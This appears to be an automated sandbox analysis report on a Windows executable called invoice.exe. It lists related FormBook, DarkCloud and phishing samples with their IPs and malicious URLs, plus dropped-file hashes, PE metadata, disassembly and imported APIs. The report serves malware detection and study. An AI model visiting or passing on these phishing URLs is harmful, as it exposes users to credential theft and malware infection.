                      https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk%2E%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FBpORLlSyDHhQozoQ5XBZtBNm/dGhvbHplckByZGd1c2EuY29tGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                      • 162.241.61.49
                      vm AUDIO_QzOXYQIfIQZ VOICE September 11th, 2024 attachment.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                      • 69.49.245.172
                      Payment Notification - 6287671568.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 69.49.245.172
                      ACPCA809768765454654.exeGet hashmaliciousFormBookBrowse
                      • 162.0.213.72
                      is homemade pepper spray legal uk 42639.jsGet hashmaliciousGookitLoaderBrowse
                      • 162.55.208.83
                      r9856_7.exeGet hashmaliciousFormBookBrowse
                      • 162.0.213.94
                      8097600987765.exeGet hashmaliciousFormBookBrowse
                      • 162.0.213.72
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • 162.0.213.94
                      QOaboeP8al.exeGet hashmaliciousDarkCloudBrowse
                      • 162.55.60.2
                      Request for Quotataion.exeGet hashmaliciousDarkCloudBrowse
                      • 162.55.60.2
                      New Purchase Order.exeGet hashmaliciousFormBookBrowse
                      • 162.0.213.94
                      Scan 00093847.exeGet hashmaliciousFormBookBrowse
                      • 162.0.213.94
                      Play_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousPhisherBrowse
                      • 162.0.217.108
                      PINDC-ASRUPurchase order.exeGet hashmaliciousFormBookBrowse
                      • 91.215.85.23
                      Remittance advice.exeGet hashmaliciousFormBookBrowse
                      • 91.215.85.23
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • 91.215.85.23
                      Quote #011698.exeGet hashmaliciousFormBookBrowse
                      • 91.215.85.23
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • 91.215.85.23
                      DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                      • 91.215.85.23
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • 91.215.85.23
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • 91.215.85.23
                      PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                      • 91.215.85.23
                      http://www.notice-ausreport.com/notice-ausreport.com:443Get hashmaliciousUnknownBrowse
                      • 91.215.85.79
                      ATGS-MMD-ASUShttp://amazoncustomer.fly.dev/Get hashmaliciousUnknownBrowse
                      • 34.160.236.64
                      http://ct08tv.congressreport.com/t/2252921/154514925/643861/2/?3e076d18=amhpbGxAbWFzZWN1cml0aWVzLmNvbQ%3d%3d&e5e2987d=MjI1MjkyMQ%3d%3d&x=84a69e84Get hashmaliciousUnknownBrowse
                      • 34.49.96.128
                      https://www.lsswis.org/Get hashmaliciousUnknownBrowse
                      • 34.36.213.229
                      QvTbUiFWlo.elfGet hashmaliciousMiraiBrowse
                      • 51.226.121.64
                      IB260MBscv.elfGet hashmaliciousUnknownBrowse
                      • 48.215.56.187
                      https://whatsthestory.dublincity.ie/Get hashmaliciousUnknownBrowse
                      • 57.129.18.113
                      https://portail.e-facture.net/Get hashmaliciousUnknownBrowse
                      • 34.149.128.2
                      RFQ-Al NASR-00388.exeGet hashmaliciousRedLineBrowse
                      • 57.128.132.216
                      https://uAa.iancendit.com/9uCUGa/K%7BEmail%7DGet hashmaliciousHTMLPhisherBrowse
                      • 34.160.236.64
                      tVdq8lEt3e.elfGet hashmaliciousMirai, OkiruBrowse
                      • 33.247.222.246

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\252778J5Y

                      Download File
                      Process:C:\Windows\SysWOW64\at.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\Sheitan

                      Download File
                      Process:C:\Users\user\Desktop\invoice.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):288768
                      Entropy (8bit):7.9941676568113
                      Encrypted:true
                      SSDEEP:6144:CWKQ+k55PHpPpBfrBZTdaiiiQAgL6wOzhb8DCzYUDLk3O+oblWsZ5uoyLjyD9Efy:0QtVb7TdDBQAEOiDHU23YlW6sjyDuF4
                      MD5:D11E413FD6314147A996756A267A951D
                      SHA1:C1EB1B031F8208096A3DACC773B72777F97A68D1
                      SHA-256:B1AAB16D8830F8457719E7CEECE3F691731039B96391B018AD62ABC1BA17587F
                      SHA-512:98877AA8EDBE6FB76410ECC0B34C56B1B0CB82D475401F33F0037D56926DB3EE7F3705156C021C4A649C31198384B66697D903E636DBF8BEFE69F438DD4D9914
                      Malicious:false
                      Reputation:low
                      Preview:...c.EEZS..<...l.D2..rPP...K9URPTD12EEZSXSP5K9URPTD12EEZS.SP5E&.\P.M...D..y.8\8.% ?36P_e&;=6<$.)\u %:dX\e...x>?Q..X_ZpD12EEZS!RY.vY2.m4#..%".I....+^.H....R".@..lU,..;3<yQU.EZSXSP5Ki.RP.E02.&.3XSP5K9UR.TF09DNZS.WP5K9URPTDq&EEZCXSPEO9UR.TD!2EEXSXUP5K9URPRD12EEZSX#T5K;URPTD10E..SXCP5[9URPDD1"EEZSXS@5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEt'=+$5K91.TTD!2EE.WXS@5K9URPTD12EEZSxSPUK9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K

                      C:\Users\user\AppData\Local\Temp\aut42FE.tmp

                      Download File
                      Process:C:\Users\user\Desktop\invoice.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):288768
                      Entropy (8bit):7.9941676568113
                      Encrypted:true
                      SSDEEP:6144:CWKQ+k55PHpPpBfrBZTdaiiiQAgL6wOzhb8DCzYUDLk3O+oblWsZ5uoyLjyD9Efy:0QtVb7TdDBQAEOiDHU23YlW6sjyDuF4
                      MD5:D11E413FD6314147A996756A267A951D
                      SHA1:C1EB1B031F8208096A3DACC773B72777F97A68D1
                      SHA-256:B1AAB16D8830F8457719E7CEECE3F691731039B96391B018AD62ABC1BA17587F
                      SHA-512:98877AA8EDBE6FB76410ECC0B34C56B1B0CB82D475401F33F0037D56926DB3EE7F3705156C021C4A649C31198384B66697D903E636DBF8BEFE69F438DD4D9914
                      Malicious:false
                      Reputation:low
                      Preview:...c.EEZS..<...l.D2..rPP...K9URPTD12EEZSXSP5K9URPTD12EEZS.SP5E&.\P.M...D..y.8\8.% ?36P_e&;=6<$.)\u %:dX\e...x>?Q..X_ZpD12EEZS!RY.vY2.m4#..%".I....+^.H....R".@..lU,..;3<yQU.EZSXSP5Ki.RP.E02.&.3XSP5K9UR.TF09DNZS.WP5K9URPTDq&EEZCXSPEO9UR.TD!2EEXSXUP5K9URPRD12EEZSX#T5K;URPTD10E..SXCP5[9URPDD1"EEZSXS@5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEt'=+$5K91.TTD!2EE.WXS@5K9URPTD12EEZSxSPUK9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K9URPTD12EEZSXSP5K

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.261623919132764
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:invoice.exe
                      File size:1'281'536 bytes
                      MD5:8387395792cfc0abb08dc4c23b8ad700
                      SHA1:10da8047d3a56f769b7b70906cfdd3342b6487ef
                      SHA256:6e66e6f4874039caa5e41d1da7b90159c8ada4373c2fd27eb080c3f6d9db5d81
                      SHA512:b8fa060e03a19a3e25019eb5a6a58b95d79b4928f46a469c015a72789ce51aee3c1879deed9a380ed07be5d4aa2b2396d1c5a89ca054aef03415ef863d34643b
                      SSDEEP:24576:/Cdxte/80jYLT3U1jfsWa/uLFfggwC4wvcWnFrAQ:ew80cTsjkWa/uJfg248Fv
                      TLSH:3D55CF2273DDC371CB769173BF6AB7016EBF78614630B85B2F880D79A910161262D7A3
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                      File Icon

                      Icon Hash:aaf3e3e3938382a0

                      Static PE Info

                      General

                      Entrypoint:0x427f4a
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66E39597 [Fri Sep 13 01:29:59 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:afcdf79be1557326c854b6e20cb900a7

                      Entrypoint Preview

                      Instruction
                      call 00007FDAB46C01ADh
                      jmp 00007FDAB46B2F74h
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      push edi
                      push esi
                      mov esi, dword ptr [esp+10h]
                      mov ecx, dword ptr [esp+14h]
                      mov edi, dword ptr [esp+0Ch]
                      mov eax, ecx
                      mov edx, ecx
                      add eax, esi
                      cmp edi, esi
                      jbe 00007FDAB46B30FAh
                      cmp edi, eax
                      jc 00007FDAB46B345Eh
                      bt dword ptr [004C31FCh], 01h
                      jnc 00007FDAB46B30F9h
                      rep movsb
                      jmp 00007FDAB46B340Ch
                      cmp ecx, 00000080h
                      jc 00007FDAB46B32C4h
                      mov eax, edi
                      xor eax, esi
                      test eax, 0000000Fh
                      jne 00007FDAB46B3100h
                      bt dword ptr [004BE324h], 01h
                      jc 00007FDAB46B35D0h
                      bt dword ptr [004C31FCh], 00000000h
                      jnc 00007FDAB46B329Dh
                      test edi, 00000003h
                      jne 00007FDAB46B32AEh
                      test esi, 00000003h
                      jne 00007FDAB46B328Dh
                      bt edi, 02h
                      jnc 00007FDAB46B30FFh
                      mov eax, dword ptr [esi]
                      sub ecx, 04h
                      lea esi, dword ptr [esi+04h]
                      mov dword ptr [edi], eax
                      lea edi, dword ptr [edi+04h]
                      bt edi, 03h
                      jnc 00007FDAB46B3103h
                      movq xmm1, qword ptr [esi]
                      sub ecx, 08h
                      lea esi, dword ptr [esi+08h]
                      movq qword ptr [edi], xmm1
                      lea edi, dword ptr [edi+08h]
                      test esi, 00000007h
                      je 00007FDAB46B3155h
                      bt esi, 03h

                      Rich Headers

                      Programming Language:
                      • [ASM] VS2013 build 21005
                      • [ C ] VS2013 build 21005
                      • [C++] VS2013 build 21005
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [ASM] VS2013 UPD5 build 40629
                      • [RES] VS2013 build 21005
                      • [LNK] VS2013 UPD5 build 40629

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x704bc.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1380000x7130.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x8dd2e0x8de00c2c2260508750422d20cd5cbb116b146False0.5729952505506608data6.675875439961112IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x8f0000x2e10e0x2e2004513b58651e3d8d87c81a396e5b2f1d1False0.3353340955284553OpenPGP Public Key5.760731648769018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xbe0000x8f740x5200c2de4a3d214eae7e87c7bfc06bd79775False0.1017530487804878data1.1988106744719143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0xc70000x704bc0x70600a62f3544445f1ec7fdd483b0328dc404False0.9412693791713015data7.922758864147164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x1380000x71300x72001254908a9a03d2bcf12045d49cd572b9False0.7703536184210527data6.782377328042204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                      RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                      RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                      RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                      RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                      RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                      RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                      RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                      RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                      RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                      RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                      RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                      RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                      RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                      RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                      RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                      RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                      RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                      RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                      RT_RCDATA0xcf7b80x67711data1.0003209840994862
                      RT_GROUP_ICON0x136ecc0x76dataEnglishGreat Britain0.6610169491525424
                      RT_GROUP_ICON0x136f440x14dataEnglishGreat Britain1.25
                      RT_GROUP_ICON0x136f580x14dataEnglishGreat Britain1.15
                      RT_GROUP_ICON0x136f6c0x14dataEnglishGreat Britain1.25
                      RT_VERSION0x136f800x14cIntel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970EnglishGreat Britain0.5963855421686747
                      RT_MANIFEST0x1370cc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                      Imports

                      DLLImport
                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                      PSAPI.DLLGetProcessMemoryInfo
                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                      UxTheme.dllIsThemeActive
                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

